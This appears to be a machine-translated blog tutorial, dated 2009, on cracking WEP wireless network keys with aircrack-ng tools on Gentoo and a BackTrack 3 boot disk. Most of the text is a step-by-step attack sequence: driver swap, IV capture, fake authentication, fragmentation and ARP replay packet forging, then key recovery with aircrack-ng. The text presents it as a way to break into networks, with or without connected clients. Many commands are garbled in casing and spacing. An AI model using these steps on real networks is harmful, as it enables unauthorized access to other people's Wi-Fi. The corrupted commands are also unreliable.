How Gentoo cracks WEP Wireless Network

20090114 note:
Now we don't need to start bt3 to crack it. We can use aircrack and the ipwraw module in Gentoo to complete everything we can do on the bt3 boot disk.

Today, based on some information from Google, we have successfully cracked several WEP wireless networks. Due to the clutter of Google's data, the following is a handwritten process during the cracking process, so I am going to forget it here.
This process can be used to crack WEP for APs with or without client connections.

Start a USB flash drive with bt3. bt3 is as follows:
Http://www.remote-exploit.org/cgi-bin/fileget? Version = bt3-usb
After Downloading this file, place the file in the USB flash drive, and make sure that the boot and bt3 directories are placed in the root directory of the USB flash drive. Execute bootinst. Sh under the boot directory, and press enter to complete the preparation of the bt3 boot disk.

1. Start with bt3 and use KDE.

2,Modprobe-r iwl3945

3,Modprobe ipwraw
Note: The above two steps are to load the driver module for my intel 3945abg Nic. The first step is to uninstall the original module, and the second step is to load the new module.
If you do not have ipwraw in Gentoo, you can download it at the following address:
Wget http://homepages.tu-darmstadt.de /~ P_larbig/WLAN/ipwraw-ng-2.3.4-04022008.tar.bz2
Download and decompress the package. Then, make & make install & make install_ucode and load the package.

4. UseAiroscriptView available Wireless Networks
You cannot enter airosocript in the command line. You need to find airosocript in the menu. (If you forget it, you can find it in the menu starting with B)

5. open a new window and enter the following:
Airodump-ng -- IVS-W outputs-C 6 wifi0
Note: outputs is the name of the stored metric data file, 6 is the channel of the target AP, and wifi0 is your Nic device number.

6. open a new window and enter the following
Aireplay-ng-1 0-e Essid-A apmac-H localmac wifi0
The above Essid is the Essid of the target network, and the apmac is the MAC of the target AP. localmac is the MAC of the local Nic, which can be found in step 1.
To, or use ifconfig, iwconfig, and iwlist to find

7. generate an XOR file to send an attack packet to the target AP.
Aireplay-NS-5-B apmac-H localmac wifi0
Wait after the words "read packages" appear. Sometimes reading hundreds of packages ends, and reading hundreds of packages ends. It seems that reading hundreds of packages does not end...
Use this packet? Enter y to generate the. XOR extension files in the current directory.

8. Prepare to send attack packets
Packetforge-ng-o-a apmac-H localmac-K packet 255.255.255.255-l packet 255.255.255-y fragment-xxxx.xor-W mrarp
Note: The preceding-L is L in lower case, And. XOR is the file generated in step 1.

9. Send attack packets
Areplay-ng-2-r mrarp-x 1024 wifi0
1024 is the packet sending interval to avoid cross-AP attacks when the attack packets are too fast.
After performing this step, you will find that the data in the record of the target AP is increasing wildly in the window after step 1, indicating that the attack was successful.

10. When data increases to around 30 thousand, open a new window and enter the following:
Aircrack-ng-N 64-B apmac outputs-0.ivs
Note: 64 refers to 64-bit encryption. If it is 128, it is changed to 128 ,. IVS is the data file generated when the command is executed in step 1. Generally, the file name is the name starting with Step 2 followed by a digital suffix.

If the character is good, the password will be displayed in hexadecimal notation!